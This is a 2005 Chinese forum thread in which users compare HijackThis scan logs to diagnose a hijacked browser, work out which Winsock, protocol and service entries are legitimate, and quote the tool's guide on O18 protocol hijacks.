O23 - NT 服务: KVSrvXP - JiangMin New Tech Ltd. - C:\PROGRA~1\KV2005\KVSrvXP.exe
O23 - NT 服务: KVWSC - Jiangmin Co.Ltd - C:\Program Files\KV2005\kvwsc.exe
O23 - NT 服务: O&O Defrag - O&O Software GmbH - C:\WINDOWS\system32\oodag.exe
O23 - NT 服务: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files\VMware\VMware Workstation\vmware-authd.exe
O23 - NT 服务: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe
O23 - NT 服务: VMware NAT Service - VMware, Inc. - C:\WINDOWS\system32\vmnat.exe

6618 · 发表于 2005-7-4 14:29:36

[这个贴子最后由6618在 2005/07/04 04:30pm 第 4 次编辑]

下面引用由xdg3669在 2005/07/04 11:17am 发表的内容：
昨晚用LSPFix汉化版.exe修复LSP：
昨晚用LSPFix汉化版.exe修复LSP：
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll

昨晚我才据你所说的下了HijackThis v1.991最新版本，kvwspxp.dll应该是江民的winsock模块，6618判断错误了，出现这个错误，是由于6618近两年没用江民，太武断了，6618在此致谦！修复办法修复安装或重装江民杀毒软件，应该就可以上网了-----如课是因为修复掉了这个而上不了网的话。
另：
O14 - IERESET.INF: START_PAGE_URL=http://mayi.01www.com/
这个是你设的吗？如果不是，删掉。
我的一点疑问，我的电脑用HijackThis v1.991扫时，有很多018的网络协议的（如下），这是网络协议，与上网有关的，为何的你的没有？是你删掉了，还是本身就没有？
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79EAC9E4-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ic32pp - {BBCA9F81-8F4F-11D2-90FF-0080C83D3571} - C:\WINDOWS\wc98pp.dll
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: mso-offdap - {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\PROGRA~1\COMMON~1\MICROS~1\WEBCOM~1\10\OWC10.DLL
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll

6618 · 发表于 2005-7-4 14:34:17

我搜索了系统、启动项DLLHOST.EXE 和SVCHOST.EXE这两个文件都在C:\WINDOWS\SYSTEM32下与您说得位置不对能否删除？
如果是这样，应该是正常的，不用删除。

6618 · 发表于 2005-7-4 16:21:47

另：如果是我下面的ActiveX对象我会删掉。
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=36467&clcid=0x409

6618 · 发表于 2005-7-4 16:41:11

[UploadFile=2_1120466170.jpg]
我上也那个网站，再用HijackThis1991扫描的时候，多出了一个BHO，如下图：
[UploadFile=3_1120466413.jpg]

xdg3669 · 发表于 2005-7-4 16:46:46

[这个贴子最后由xdg3669在 2005/07/04 04:52pm 第 2 次编辑]

下面引用由6618在 2005/07/04 02:29pm 发表的内容：
昨晚我才据你所说的下了HijackThis v1.991最新版本，kvwspxp.dll应该是江民的winsock模块，6618判断错误了，出现这个错误，是由于6618近两年没用江民，太武断了，6618在此致谦！修复办法修复安装或重装江民杀毒　...

我的有时候会出现，有时也没列出。哪次没有列出！我查了使用说明：
（二十二）组别——O18
1. 项目说明
O18项列举现有的协议（protocols）用以发现额外的协议和协议“劫持”。相关注册表项目包括
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
等等。
通过将您的电脑的默认协议替换为自己的协议，恶意网站可以通过多种方式控制您的电脑、监控您的信息。
[color=#DC143C]HijackThis会列举出默认协议以外的额外添加的协议，并列出其在电脑上的保存位置。
2. 举例
O18 - Protocol: relatedlinks - {5AB65DD4-01FB-44D5-9537-3767AB80F790} - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll
O18 - Protocol: mctp - {d7b95390-b1c5-11d0-b111-0080c712fe82}
O18 - Protocol hijack: http - {66993893-61B8-47DC-B10D-21E0C86DD9C8}
3. 一般建议
已知`cn` (CommonName)、`ayb` (Lop.com)和`relatedlinks` (Huntbar)是需要用HijackThis修复的。其它情况复杂，可能（只是可能）有一些间谍软件存在，需要进一步查询资料、综合分析。
4. 疑难解析
（暂无）

xdg3669 · 发表于 2005-7-4 16:50:56

下面引用由6618在 2005/07/04 04:41pm 发表的内容：
我上也那个网站，再用HijackThis1991扫描的时候，多出了一个BHO，如下图：

[color=#DC143C]多出了一个什么BHO控件？

		自动登录	找回密码
密码			注册

[求助]紧急呼救！浏览器被劫持，网友们来处理一下！